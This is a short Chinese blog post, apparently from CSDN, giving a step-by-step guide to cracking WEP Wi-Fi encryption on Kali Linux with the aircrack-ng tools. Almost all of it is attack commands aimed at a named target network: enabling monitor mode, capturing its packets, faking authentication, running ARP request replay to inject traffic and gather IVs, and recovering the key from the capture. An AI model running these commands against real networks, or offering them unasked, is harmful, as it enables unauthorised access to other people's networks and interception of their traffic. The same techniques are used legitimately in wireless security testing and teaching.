kali:加速WEP黑客攻击,ARP请求重播攻击

版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396280

参考文章

1、检查网卡支持

airmon-ng start wlan0 [或wlan1]

airserv-ng -d mon0  #开启监听模式
aireplay-ng -9 127.0.0.1:666 #尝试注入服务器

2、检查信号强度

airodump-ng mon0来查看范围内的网络列表
收集有效信息:

ESSID - DIGISOL
BSSID - 00:17:7C:22:CB:80
CH(通道) - 2
连接到网络的正版用户的Mac地址:
接口:wlan1 - 简称mon0

至少一个用户去连接到网络,产生ARP请求包,我们才能进行攻击。

aireplay-ng --test -e DIGISOL -a 00:17:7C:22:CB:80 mon0   #对目标网络测试```
![image.png](http://upload-images.jianshu.io/upload_images/5145235-ebd9c9934f73b828.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)


```airodump-ng -c 2 --bssid 00:17:7C:22:CB:80 -w dump mon0 #捕获数据包```

>伪造身份验证

```aireplay-ng -1 0 -e DIGISOL -a 00:17:7C:22:CB:80 mon0```

![认证和捕获数据包](http://upload-images.jianshu.io/upload_images/5145235-4243a569067b0953.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

##ARP请求重播模式
ARP数据包是获取大量IV或数据的最佳选择。没有IVs,你不能hack网络
```aireplay-ng -3 -b 00:17:7C:22:CB:80 mon0  #使aireplay-ng收听AP的ARP数据包,并在找到它们后立即注入。这样会很快创建大量的数据```  
##破解网络
```aircrack-ng dump-01.cap```


上一篇:虚拟主机供应商 Linode 从 Xen 迁移到 KVM


下一篇:7天ECS训练营学习笔记-如何在Linux环境下搭建ftp服务